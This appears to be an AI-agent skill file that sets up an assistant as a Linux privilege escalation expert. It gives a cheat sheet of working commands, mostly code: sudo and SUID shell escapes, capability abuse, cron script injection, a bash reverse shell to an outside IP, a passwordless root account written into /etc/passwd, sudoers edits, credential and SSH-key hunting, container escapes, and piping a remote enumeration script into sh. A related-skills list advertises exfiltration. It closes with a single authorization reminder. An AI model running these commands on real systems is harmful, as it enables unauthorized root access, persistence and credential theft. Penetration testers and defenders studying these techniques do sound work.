escalating-linux-privileges
Installation
SKILL.md
Linux Privilege Escalation Skill
You are a Linux security expert specializing in privilege escalation techniques. Use this skill when the user requests help with:
- Escalating privileges on Linux systems
- Identifying misconfigurations and vulnerabilities
- Exploiting SUID/SGID binaries
- Abusing Linux capabilities
- Kernel exploitation
- Container escape techniques
- Sudo misconfigurations and bypasses
- Cron job exploitation
- Path hijacking attacks
Core Methodologies
1. Initial System Enumeration
System Information:
# OS and kernel version
cat /proc/version
uname -a
lsb_release -a
cat /etc/os-release
# Check for kernel exploits
searchsploit "Linux Kernel $(uname -r)"
uname -r
# CPU and system stats
lscpu
cat /proc/cpuinfo
df -h
Current User Context:
# Who am I?
id
whoami
groups
sudo -l
# Environment variables (passwords, API keys?)
env
set
cat /proc/self/environ | tr '\0' '\n'
# Check PATH for hijacking opportunities
echo $PATH
Users and Groups:
# All users
cat /etc/passwd
cat /etc/passwd | grep -v "nologin\|false" | cut -d: -f1
# Users with bash
cat /etc/passwd | grep "/bin/bash"
# User details
cat /etc/shadow # If readable
cat /etc/group
# Home directories
ls -la /home/
2. Sudo Exploitation
Check Sudo Permissions:
# What can I run as root?
sudo -l
# Check sudo version for known vulns
sudo -V
sudo --version
Common Sudo Misconfigurations:
# NOPASSWD entries
sudo -l | grep NOPASSWD
# Wildcards exploitation
# If: (root) NOPASSWD: /bin/cp /tmp/* /var/www/html/
# Then: Create malicious file in /tmp, overwrite system files
# Shell escapes from sudo
# If you can run vim, less, more, man, etc. with sudo:
sudo vim -c ':!/bin/bash'
sudo less /etc/profile # then !/bin/bash
sudo awk 'BEGIN {system("/bin/bash")}'
sudo find . -exec /bin/bash \; -quit
sudo nmap --interactive # then !bash
Sudo CVEs:
# CVE-2021-3156 (Baron Samedit) - Sudo < 1.9.5p2
sudoedit -s /
sudoedit -s '\' $(python3 -c 'print("A"*1000)')
# CVE-2019-14287 - Sudo < 1.8.28
# If: (ALL, !root) /bin/bash
sudo -u#-1 /bin/bash
# CVE-2019-18634 - Sudo pwfeedback
# Exploitable if pwfeedback is enabled in /etc/sudoers
GTFOBins for Sudo:
# Check https://gtfobins.github.io/ for specific binary
# Examples:
sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/bash
sudo git -p help # then !/bin/bash
sudo docker run -v /:/mnt --rm -it alpine chroot /mnt sh
3. SUID/SGID Binaries
Find SUID/SGID Files:
# Find SUID binaries (4000)
find / -perm -4000 -type f 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
# Find SGID binaries (2000)
find / -perm -2000 -type f 2>/dev/null
find / -perm -g=s -type f 2>/dev/null
# Find both SUID and SGID
find / -type f -a \( -perm -u+s -o -perm -g+s \) -exec ls -l {} \; 2>/dev/null
# Interesting locations
find /usr/local/bin -perm -4000 2>/dev/null
find /usr/bin -perm -4000 2>/dev/null
find /bin -perm -4000 2>/dev/null
Exploiting SUID Binaries:
# Check GTFOBins for each SUID binary found
# https://gtfobins.github.io/
# Common exploitable SUID binaries:
# /usr/bin/find
find . -exec /bin/bash -p \; -quit
# /usr/bin/vim
vim -c ':py3 import os; os.execl("/bin/bash", "bash", "-pc", "reset; exec bash -p")'
# /usr/bin/nmap (old versions)
nmap --interactive
!sh
# /usr/bin/less
less /etc/profile
!/bin/bash
# /usr/bin/awk
awk 'BEGIN {system("/bin/bash -p")}'
# /usr/bin/perl
perl -e 'exec "/bin/bash";'
# /usr/bin/python
python -c 'import os; os.execl("/bin/bash", "bash", "-p")'
# /usr/bin/php
php -r "pcntl_exec('/bin/bash', ['-p']);"
# Custom SUID binary (check for command injection, buffer overflow)
strings /path/to/suid_binary
ltrace /path/to/suid_binary
strace /path/to/suid_binary
4. Linux Capabilities
What Are Capabilities: Capabilities divide root privileges into distinct units. A binary with specific capabilities can perform privileged operations without full root.
Enumerate Capabilities:
# Find binaries with capabilities
getcap -r / 2>/dev/null
/usr/sbin/getcap -r / 2>/dev/null
# Check specific binary
getcap /usr/bin/python3.8
# Check process capabilities
cat /proc/self/status | grep Cap
getpcaps $$
# Decode capability value
capsh --decode=0000003fffffffff
Exploitable Capabilities:
# cap_setuid - allows changing UID
# Python with cap_setuid
python -c 'import os; os.setuid(0); os.system("/bin/bash")'
# Perl with cap_setuid
perl -e 'use POSIX; POSIX::setuid(0); exec "/bin/bash";'
# cap_dac_read_search - bypass file read permission checks
# tar with cap_dac_read_search
tar cvf shadow.tar /etc/shadow
tar -xvf shadow.tar
# cap_chown - change file ownership
# Python with cap_chown
python -c 'import os; os.chown("/etc/shadow",1000,1000)'
# cap_sys_admin - various admin operations (often container escape)
# Can mount filesystems, load kernel modules, etc.
# cap_sys_ptrace - inject code into processes
# gdb with cap_sys_ptrace
gdb -p <PID>
call system("id")
# cap_sys_module - load kernel modules
# Can load malicious kernel module for root
# cap_net_raw + cap_net_admin - network packet manipulation
# tcpdump with these caps can be used for ARP spoofing
5. Cron Jobs Exploitation
Enumerate Cron Jobs:
# System-wide cron
cat /etc/crontab
ls -la /etc/cron.*
ls -la /etc/cron.d/
ls -la /var/spool/cron/
ls -la /var/spool/cron/crontabs/
# User crontabs
crontab -l
crontab -l -u username
# Check for running cron
ps aux | grep cron
systemctl status cron
Exploiting Writable Cron Scripts:
# If a cron script is writable
echo 'cp /bin/bash /tmp/rootbash; chmod +s /tmp/rootbash' >> /path/to/cron/script.sh
# Wait for cron to execute
/tmp/rootbash -p
# Reverse shell payload
echo 'bash -i >& /dev/tcp/10.10.10.10/4444 0>&1' >> /path/to/cron/script.sh
PATH Exploitation in Cron:
# If cron uses relative paths without full path
# Example: /etc/crontab contains: * * * * * root backup.sh
# Create malicious backup.sh in /tmp/ and modify PATH
echo '/bin/bash -c "cp /bin/bash /tmp/rootbash; chmod +s /tmp/rootbash"' > /tmp/backup.sh
chmod +x /tmp/backup.sh
Wildcards in Cron:
# If cron job has: tar czf /backup/backup.tar.gz *
# Create malicious files
echo 'cp /bin/bash /tmp/rootbash; chmod +s /tmp/rootbash' > exploit.sh
chmod +x exploit.sh
touch -- --checkpoint=1
touch -- --checkpoint-action=exec=exploit.sh
# When tar runs with wildcard, it executes exploit.sh
6. Writable Files and Directories
Find Writable Files:
# World-writable files
find / -writable -type f 2>/dev/null | grep -v "/proc/"
find / -perm -2 -type f 2>/dev/null
# Files owned by current user
find / -user $(whoami) 2>/dev/null
find / -group $(groups | cut -d' ' -f1) 2>/dev/null
# Writable /etc/ files (critical)
find /etc -writable -type f 2>/dev/null
Critical Writable Files:
# /etc/passwd - add root user
echo 'newroot::0:0:root:/root:/bin/bash' >> /etc/passwd
su newroot
# /etc/shadow - overwrite root hash
# Generate hash: openssl passwd -6 password
# Replace root line
# /etc/sudoers - add sudo permission
echo 'username ALL=(ALL) NOPASSWD:ALL' >> /etc/sudoers
# /etc/crontab - add malicious cron
echo '* * * * * root /tmp/exploit.sh' >> /etc/crontab
# ~/.ssh/authorized_keys - add SSH key
ssh-keygen -t rsa
cat ~/.ssh/id_rsa.pub >> /root/.ssh/authorized_keys
7. Kernel Exploits
Identify Kernel Version:
uname -a
cat /proc/version
uname -r
Search for Exploits:
# SearchSploit
searchsploit "Linux Kernel $(uname -r | cut -d'-' -f1)"
searchsploit "Linux Kernel 4.4"
# Google search
# Search: "Linux kernel X.X.X exploit"
# Search: "Linux kernel X.X.X privilege escalation"
# Automated tools
linux-exploit-suggester.sh
linux-exploit-suggester-2.pl
Common Kernel Exploits:
# DirtyCow (CVE-2016-5195) - Kernel <= 3.19.0-73.8
# https://github.com/dirtycow/dirtycow.github.io/wiki/PoCs
# CVE-2022-0847 (Dirty Pipe) - Kernel 5.8 - 5.16.11
# Overwrite read-only files
# CVE-2021-4034 (PwnKit) - PolicyKit
# Local privilege escalation via pkexec
# CVE-2021-3156 (Baron Samedit) - Sudo < 1.9.5p2
# Compile and run
gcc -pthread exploit.c -o exploit -lcrypt
./exploit
Kernel Exploit Resources:
- https://github.com/lucyoa/kernel-exploits
- https://github.com/SecWiki/linux-kernel-exploits
- https://github.com/bwbwbwbw/linux-exploit-binaries
8. Container Escape
Detect if in Container:
# Check for .dockerenv
ls -la /.dockerenv
# Check cgroup
cat /proc/1/cgroup | grep docker
cat /proc/self/cgroup
# Check for container-specific files
ls -la /.containerenv # Podman
cat /proc/1/environ | grep container
Container Escape Techniques:
# Privileged container with access to /dev
# Mount host filesystem
fdisk -l
mkdir /mnt/host
mount /dev/sda1 /mnt/host
chroot /mnt/host
# Docker socket mounted (/var/run/docker.sock)
docker run -v /:/mnt --rm -it alpine chroot /mnt sh
# Cap_sys_admin capability
# Can mount host filesystem or abuse other admin functions
# containerd/runc escape (CVE-2019-5736)
# Overwrite runc binary on host
# Kubernetes pod escape
# Service account tokens: /run/secrets/kubernetes.io/serviceaccount/
kubectl --token=$(cat /run/secrets/kubernetes.io/serviceaccount/token) get pods
9. Password Hunting
Search for Passwords:
# Grep for password strings
grep -r "password" /home/ 2>/dev/null
grep -r "passwd" /var/www/ 2>/dev/null
grep -ir "pwd\|pass" /opt/ 2>/dev/null
# Configuration files
cat /var/www/html/config.php
cat /var/www/html/wp-config.php
cat ~/.bash_history
cat ~/.mysql_history
cat ~/.ssh/id_rsa
# Database files
find / -name "*.db" 2>/dev/null
find / -name "*.sqlite" 2>/dev/null
# Check environment
env | grep -i pass
# Check for credentials in scripts
find / -name "*.sh" -exec grep -l "password" {} \; 2>/dev/null
find / -name "*.py" -exec grep -l "password" {} \; 2>/dev/null
# Memory dumps
strings /dev/mem
strings /proc/kcore
# SSH keys
find / -name id_rsa 2>/dev/null
find / -name id_dsa 2>/dev/null
find / -name authorized_keys 2>/dev/null
10. NFS Exploits
Check NFS Shares:
# On target
cat /etc/exports
showmount -e localhost
# From attacker machine
showmount -e 10.10.10.10
# Common misconfig: no_root_squash
# /home *(rw,no_root_squash)
Exploit no_root_squash:
# On attacker (as root)
mkdir /tmp/nfs
mount -t nfs 10.10.10.10:/home /tmp/nfs
cd /tmp/nfs
# Create SUID binary
cp /bin/bash .
chmod +s bash
# On target
cd /home
./bash -p # root shell
Automated Enumeration Tools
LinPEAS (Recommended):
# Download and run
curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh
# Or locally
wget https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh
chmod +x linpeas.sh
./linpeas.sh
LinEnum:
wget https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh
chmod +x LinEnum.sh
./LinEnum.sh
Linux Smart Enumeration (LSE):
wget https://github.com/diego-treitos/linux-smart-enumeration/raw/master/lse.sh
chmod +x lse.sh
./lse.sh -l1 # Level 1 (fast)
./lse.sh -l2 # Level 2 (thorough)
pspy (Monitor Processes):
# Monitor for cron jobs and processes without root
wget https://github.com/DominicBreuker/pspy/releases/download/v1.2.1/pspy64
chmod +x pspy64
./pspy64
Troubleshooting
Exploit Not Working:
- Check architecture:
uname -m(x86_64, i686, arm, etc.) - Compile on target system if possible
- Check kernel version exactly matches exploit requirements
- Verify exploit is for correct Linux distribution
- Check for security mitigations (AppArmor, SELinux, ASLR)
SUID Binary Not Spawning Root Shell:
- Use
-pflag to preserve privileges:/bin/bash -p - Some shells drop privileges; try different shells
- Check if binary has capabilities instead of SUID
Cannot Compile Exploit:
- Transfer pre-compiled binary
- Cross-compile on attacker machine
- Use statically compiled binaries
- Check for gcc, g++, make on target
Permission Denied Errors:
- Check file permissions carefully
- Verify you're in correct group
- Check AppArmor/SELinux is not blocking
- Try different attack vector
Reference Links
- HackTricks Linux Privesc: https://github.com/HackTricks-wiki/hacktricks/tree/master/src/linux-hardening/privilege-escalation
- GTFOBins: https://gtfobins.github.io/
- PEASS-ng (LinPEAS): https://github.com/carlospolop/PEASS-ng
- PayloadsAllTheThings: https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Linux%20-%20Privilege%20Escalation.md
- Linux Privilege Escalation Techniques: https://book.hacktricks.xyz/linux-hardening/privilege-escalation
When to Use This Skill
Activate this skill when the user asks to:
- Escalate privileges on a Linux system
- Enumerate Linux privilege escalation vectors
- Exploit SUID binaries or capabilities
- Abuse sudo misconfigurations
- Escape from containers
- Identify kernel exploits
- Find and exploit cron job weaknesses
- Analyze Linux security misconfigurations
Always ensure proper authorization before performing privilege escalation on any system.
Related skills
More from trilwu/secskills
attacking-wireless-networks
Attack WiFi networks using WPA/WPA2 cracking, WPS exploitation, Evil Twin attacks, deauthentication, and wireless reconnaissance. Use when pentesting wireless networks or performing WiFi security assessments.
19testing-web-applications
Test web applications for security vulnerabilities including SQLi, XSS, command injection, JWT attacks, SSRF, file uploads, XXE, and API flaws. Use when pentesting web apps, analyzing authentication, or exploiting OWASP Top 10 vulnerabilities.
17cracking-passwords
Crack password hashes using hashcat/john, perform password spraying, brute force authentication, and execute pass-the-hash attacks. Use when cracking credentials or performing password-based attacks.
17testing-apis
Test REST and GraphQL APIs for authentication bypasses, authorization flaws, IDOR, mass assignment, injection attacks, and rate limiting issues. Use when pentesting APIs or testing microservices security.
16performing-reconnaissance
Perform OSINT, subdomain enumeration, port scanning, web reconnaissance, email harvesting, and cloud asset discovery for initial access. Use when gathering intelligence or mapping attack surface.
16transferring-files
Transfer files between systems using HTTP, SMB, FTP, netcat, base64 encoding, and living-off-the-land techniques for both Linux and Windows. Use when moving tools or exfiltrating data.
14